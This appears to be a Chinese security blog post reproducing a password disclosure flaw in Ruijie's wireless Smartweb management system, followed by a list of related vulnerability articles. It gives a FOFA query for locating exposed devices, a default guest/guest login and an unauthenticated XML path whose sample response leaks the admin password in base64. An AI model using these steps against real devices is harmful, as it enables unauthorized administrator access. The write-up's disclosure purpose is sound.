锐捷 Smartweb管理系统 密码信息泄露漏洞
漏洞描述
i ⭐
锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。
漏洞影响
s ✅
锐捷网络股份有限公司 无线smartweb管理系统
空间测绘
d ⭕
FOFA:title="无线smartWeb--登录页面"
漏洞复现
- ✅访问首页,存在账号
guest/guest
登陆
- 而且响应中包含了 admin密码的base64加密,直接全局搜索admin可以看到
- 访问未授权路径
/web/xml/webuser-auth.xml
<userauth>
<user>
<name>
<![CDATA[ admin ]]>
</name>
<password>
<![CDATA[ YWRtaW46cXNsYmJzaHlj ]]>
</password>
<page>all</page>
<level>0</level>
<favorites>
<![CDATA[ ]]>
</favorites>
</user>
个人博客
孤桜懶契:https://gylq.gitee.io/time
锐捷 Smartweb管理系统 密码信息泄露漏洞相关推荐
- CNVD-2021-17369 -- 锐捷Smartweb管理系统 密码信息泄露漏洞
锐捷Smartweb管理系统 密码信息泄露漏洞 0X001前言 0X002 漏洞影响 0X003 漏洞原理 0X004 漏洞复现 0X041 空间搜索寻找目标 0X042尝试弱口令登陆 0X043查看 ...
- 锐捷 Smartweb管理系统 命令执行漏洞
锐捷 Smartweb管理系统 0x01 漏洞描述 0x02 漏洞指纹 0x03 漏洞复现 0x01 漏洞描述 锐捷网络是一家拥有包括交换机.路由器.软件.安全防火墙.无线产品.存储等全系列的网络设备 ...
- MessageSolution企业邮件归档管理系统EEA信息泄露漏洞(cnvd-2021-10543)
MessageSolution企业邮件归档管理系统EEA信息泄露漏洞(cnvd-2021-10543) 1.漏洞描述 MessageSolution企业邮件归档管理系统 / MessageSoluti ...
- D-Link DCS系列监控 账号密码信息泄露漏洞
漏洞简介 D-Link DCS-2200是一款监控摄像机,成像色彩为彩色 是一款网络摄像机, 根据VULDB 所看到的信息原文如下 A vulnerability, which was classif ...
- 多家防火墙设备存在信息泄露漏洞
概述 漏洞名称 多家防火墙设备存在信息泄露漏洞安全通告 发布日期 2021-06-16 受影响产品及版本 胜鑫塔下一代防火墙XT6000-A-FW-1.0.0-0-2778 利谱第二代防火墙6164- ...
- 配置snmp_多种设备基于 SNMP 协议的敏感信息泄露漏洞数据分析报告
作者:知道创宇404实验室 1. 更新情况 2. 事件概述 SNMP协议[1],即简单网络管理协议(SNMP,Simple Network Management Protocol),默认端口为 161 ...
- MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543复现
MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543复现 一.简介 MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司 ...
- 基于MessageSolution 邮件归档系统EEA的通用型信息泄露漏洞挖洞
前几天无意间看到这个通用型漏洞,编号是CNVD-2021-10543,想着也来试试.MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统.该系 ...
- CNVD-2021-10543 -- MessageSolution 邮件归档系统EEA 信息泄露漏洞
MessageSolution 邮件归档系统EEA 信息泄露漏洞 0X001前言 0X002 漏洞影响 0X003 漏洞原理 0X004 漏洞复现 0X041 空间搜索寻找目标 0X042获取敏感信息 ...
最新文章
- 全球及中国汽车涂料市场前景态势与投资渠道分析报告2022版
- [Android] 使用Matrix矩阵类对图像进行缩放、旋转、对比度、亮度处理
- 两个学习英语的好软件
- java des3加密_JAVA加密算法(3)- 对称加密算法(DES、3DES、AES)
- 各位大佬,Spark的重点难点系列暂时更新完毕
- Scrapy豆瓣电影top250(excel保存和图片下载)
- 解决qt.qpa.plugin: Could not load the Qt platform plugin “xcb“问题
- as常用固定搭配_初中英语常用固定搭配
- 硬盘三大种类( SSD ; HHD ; HDD )
- [歪谈]拽一个贵人出来给你当炮架子
- 微信小程序(八)实战——加载图片images
- android全局的dialog,使android的dialog全局显示
- base64真正的作用和意义
- 算法学习-零子数组,最大连续子数组
- TAKE2获GRAIL 授权早期鼻咽癌检测技术
- 论文参考文献类型代码及书写格式
- ctf-crypto-7+1+0
- ubuntu中对于大小写锁定键的控制
- 小程序引用阿里iconfont
- Python仓库管理系统源代码,库存管理系统源码,基于flask,内含数据库文件,已实现出入库、库存预警,库存搜索等功能
热门文章
- 京东商品及评论 数据采集
- mysql删除用户并回收权限
- RootBeanDefinition、ChildBeanDefinition、GenericBeanDefinition的区别
- python与机器学习
- [益智]:怎么称才能用三次就找到球
- 启动计算机加载状态监控器,状态监控器显示脱机。
- 旺旺机器人的快捷短语_机器人配置和我的快捷短语
- 《赢在用户-Web人物角色创建和应用实践指南》
- openstack跟着官网部署过程
- ImportError: cannot import name ‘get_num_classes’ from ‘torchmetrics.utilities.data’